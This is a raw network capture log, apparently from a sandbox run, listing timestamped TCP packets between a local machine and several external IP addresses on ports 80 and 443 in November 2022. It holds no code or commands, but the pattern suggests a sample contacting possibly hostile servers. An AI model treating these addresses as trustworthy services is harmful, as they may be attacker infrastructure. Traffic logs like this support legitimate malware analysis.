                                                        Nov 20, 2022 23:29:07.028141975 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028166056 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028203011 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028219938 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028239012 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028278112 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028307915 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028314114 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028348923 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028357983 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028384924 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028422117 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028438091 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028456926 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028492928 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028525114 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028529882 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028568029 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028574944 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028603077 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028639078 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028657913 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028676033 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028739929 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.029253006 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.297137022 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297216892 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297264099 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297311068 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297358036 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297386885 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.297436953 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.297436953 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.301995039 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302043915 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302087069 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302131891 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302151918 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302177906 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302221060 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302242994 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302263975 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302284956 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302309036 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302351952 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302386045 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302395105 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302407980 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302438974 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302448034 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302485943 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302495003 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302530050 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302532911 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302571058 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302613974 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302623987 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302654982 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302661896 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302696943 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302700043 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302740097 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302750111 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302783012 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302815914 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302825928 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302834988 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302869081 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302876949 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302932024 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302952051 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303000927 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303041935 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303057909 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303085089 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303096056 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303128004 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303136110 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303170919 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303180933 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303214073 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303236961 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303256989 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303272963 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303299904 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303302050 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303339958 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303383112 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303396940 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303396940 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303539991 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:08.151849031 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.363353968 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:08.366508007 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.366631985 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.366631985 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.577193975 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.296233892 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.296310902 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.296400070 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:09.296461105 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:09.504890919 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.760251999 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.019068003 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:10.022627115 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.022917986 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.022954941 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.281825066 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.131357908 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.131469965 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.131572962 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:11.131629944 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:11.390239954 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.403815031 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.593519926 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:11.593688965 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.593775034 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.594141960 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.791567087 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:12.459825993 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:12.459882975 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:12.459969044 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:12.459969044 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:12.536688089 CET4970780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:12.611358881 CET804970741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:12.611511946 CET4970780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:12.646313906 CET4970780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:12.646435976 CET4970780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:12.649957895 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:12.721805096 CET804970741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:13.043040037 CET804970741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:13.043205976 CET4970780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:13.063014984 CET804970741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:13.063182116 CET4970780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:13.213447094 CET4970780192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:13.286906004 CET804970741.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:13.469697952 CET4970880192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:13.655150890 CET8049708190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:13.655361891 CET4970880192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:13.661755085 CET4970880192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:13.661802053 CET4970880192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:13.847259998 CET8049708190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:14.547209024 CET8049708190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:14.547250032 CET8049708190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:14.547348976 CET4970880192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:14.547348976 CET4970880192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:14.635674000 CET4970980192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:14.722065926 CET804970941.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:14.722290993 CET4970980192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:14.738857985 CET8049708190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:14.755305052 CET4970980192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:14.755305052 CET4970980192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:14.843252897 CET804970941.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:15.188577890 CET804970941.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:15.188754082 CET4970980192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:15.190502882 CET804970941.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:15.190588951 CET4970980192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:15.217324972 CET4971080192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:15.276494980 CET804970941.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:15.415148020 CET8049710190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:15.417480946 CET4971080192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:15.417911053 CET4971080192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:15.418381929 CET4971080192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:15.615210056 CET8049710190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:16.315767050 CET8049710190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:16.315828085 CET8049710190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:16.315965891 CET4971080192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:16.315965891 CET4971080192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:16.519347906 CET8049710190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:16.596225977 CET4971180192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:16.765997887 CET8049711190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:16.771547079 CET4971180192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:16.771595955 CET4971180192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:16.771632910 CET4971180192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:16.945817947 CET8049711190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:17.579442978 CET8049711190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:17.579952002 CET4971180192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:17.586487055 CET8049711190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:17.586576939 CET4971180192.168.2.4190.147.188.50
                                                        Nov 20, 2022 23:29:17.620424986 CET4971280192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:17.756084919 CET8049711190.147.188.50192.168.2.4
                                                        Nov 20, 2022 23:29:17.820367098 CET8049712190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:17.820544004 CET4971280192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:17.825717926 CET4971280192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:17.825717926 CET4971280192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:18.026460886 CET8049712190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:18.733083010 CET8049712190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:18.733216047 CET4971280192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:18.736743927 CET8049712190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:18.736840963 CET4971280192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:18.760179043 CET4971380192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:18.844605923 CET804971341.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:18.844758034 CET4971380192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:18.844870090 CET4971380192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:18.844870090 CET4971380192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:18.929658890 CET804971341.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:18.932296991 CET8049712190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:19.285669088 CET804971341.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:19.286097050 CET4971380192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:19.288542986 CET804971341.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:19.291462898 CET4971380192.168.2.441.41.255.235
                                                        Nov 20, 2022 23:29:19.316365957 CET4971480192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:19.369600058 CET804971341.41.255.235192.168.2.4
                                                        Nov 20, 2022 23:29:19.585880041 CET8049714222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:19.586110115 CET4971480192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:19.586363077 CET4971480192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:19.586421967 CET4971480192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:19.856014013 CET8049714222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:20.763540030 CET8049714222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:20.763582945 CET8049714222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:20.763823032 CET4971480192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:20.763823032 CET4971480192.168.2.4222.236.49.123
                                                        Nov 20, 2022 23:29:20.789218903 CET4971580192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:20.999140024 CET8049715138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:20.999270916 CET4971580192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:20.999356985 CET4971580192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:20.999810934 CET4971580192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:21.033257008 CET8049714222.236.49.123192.168.2.4
                                                        Nov 20, 2022 23:29:21.207751989 CET8049715138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:21.939101934 CET8049715138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:21.939162970 CET8049715138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:21.939357042 CET4971580192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:21.939428091 CET4971580192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:21.984133959 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:21.984201908 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:21.984292984 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:21.985869884 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:21.985914946 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.060832024 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.060960054 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.071544886 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.071573973 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.072091103 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.089323997 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.089359045 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.133986950 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.134021997 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.134195089 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.134238958 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.147792101 CET8049715138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:22.161990881 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.162159920 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.162201881 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.162296057 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.162385941 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.162414074 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.162518978 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.162601948 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.162622929 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.190637112 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.190810919 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.190849066 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.190911055 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.190983057 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.190999985 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.191025019 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191062927 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.191175938 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191250086 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.191273928 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191386938 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191468954 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.191498041 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191531897 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191602945 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.191622019 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191704988 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.191777945 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.191797018 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.219786882 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.219950914 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.219989061 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220081091 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220104933 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220177889 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.220200062 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220221043 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.220283031 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220364094 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.220381021 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220454931 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220524073 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.220541954 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220634937 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220721960 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.220741987 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220835924 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220922947 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.220942020 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.220988035 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221066952 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.221086979 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221261978 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221340895 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.221360922 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221447945 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221519947 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.221537113 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221729040 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221818924 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.221837044 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.221956015 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.222033024 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.222055912 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.222165108 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.222242117 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.222260952 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.250317097 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.250498056 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.250534058 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.250575066 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.250658035 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.250680923 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.250719070 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.250794888 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.250813007 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.250936985 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.251022100 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.251044989 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.251257896 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.251348972 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.251372099 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.251519918 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.251610994 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.251632929 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.251717091 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.251791954 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.251811028 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252002954 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252106905 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.252126932 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252245903 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252335072 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.252353907 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252468109 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252554893 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.252576113 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252671003 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252749920 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.252774000 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.252948046 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.253020048 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.253041029 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.253174067 CET443497165.135.247.111192.168.2.4
